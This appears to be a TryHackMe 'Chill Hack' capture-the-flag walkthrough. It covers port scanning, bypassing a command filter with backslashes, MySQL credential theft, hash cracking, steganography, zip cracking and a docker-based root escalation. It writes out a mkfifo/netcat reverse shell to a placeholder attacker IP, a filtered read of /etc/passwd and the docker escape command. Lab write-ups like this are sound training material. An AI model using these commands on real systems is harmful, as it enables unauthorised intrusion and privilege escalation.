TryHackMe — Chill Hack Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
Let’s start things off with a network scan to see which ports are open and the services running on each.
$ nmap -A -O -sC -sV -p- <machine_IP>Using Gobuster to enumerate the directories on the web server.
In the FTP server this is the content of the note text file.
Okay, there’s a filter used, but where?
Vulnerability Assessment:
I visited the web page and didn’t find much, so I went to the /secret page and found the command text.
I tried a few commands like whoami, uname -a, ps, and even sudo -l without issue.
Sudo -l showed that the server can run the script helpline.sh
However, trying the cat, head, tail and I’m sure more commands prompted a denial.
It’s a long shot but I gave a reverse shell a shot and it of course got denied.
I tried to base64 encode some commands but that didn’t work. Next up I tried to find a few ways to test bypassing filters.
Initial Foothold:
I tried a few things and one that worked was using a backslash!
$ c\at /etc/passwd
Awesome! Now to try the reverse shell again with a backslash..
$ r\m /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack_IP> <PORT> >/tmp/f
Got access! Since this account can run that script from earlier, I wonder what’s in it.
Being able to run that as user Apaar, here’s the command:
$ sudo -u apaar /home/apaar/.helpline.shI had to play around with the script for a while before I was able to figure out that I could call a shell and escalate my privileges to the user apaar.
I ended up using /bin/bash as the person and as the message and returned a shell.
I checked for cronjobs, if this user could run anything as root, binaries with the SUID bit set so I could escalate to root but those didn’t work.
A good place to check for hidden directories/files is actually in the /var/www directory.
When I checked in there, I saw a directory called files along with the html directory with the files for the web server.
Inside /files there are some php files to inspect.
Out of the files inside that directory, index.php had some credentials for mysql!
Another file, hacker.php had an interesting “hint” with an image. I might need to come back to that..
For now, I’ll go ahead and grab it to my machine using a python server.
Well, time to see if there’s a sql server accessible.
There is and the credentials worked!
Using:
select * from users;
I visited crackstation[.]net to see if those hashes could be cracked and they could.
I tried to escalate to user anurodh with the cracked hash but it didn’t work!
Lateral Pivoting:
Alright, no worries, that means I’ll have to try some steganography on the image from earlier and hope something is there.
$ stegseek -sf filename -wl /usr/share/wordlists/rockyou.txt
When trying to unzip the file it was password protected. The tool fcrackzip helped take care of that issue.
$ fcrackzip -D filename -p /usr/share/wordlists/rockyou.txt -u
I’ll unzip that file now.
Upon inspecting the php file there were some base64 encoded credentials and a username.
Got the base64 decoded and got that user’s password.
Escalating to that user is a success!
I searched for a way to escalate to root and even the other user on the box, aurick, but didn’t have any luck.
I then thought that maybe I had to exploit docker somehow since this user was part of that group.
Privilege Escalation/Exploit:
There had to be a way to escalate. I checked gtfobins to see if there was anything about docker and there was!
$ docker run -v /:/mnt - rm -it alpine chroot /mnt shI ran the command and got root privileges!
Now I’ll grab the root flag and be on my way!
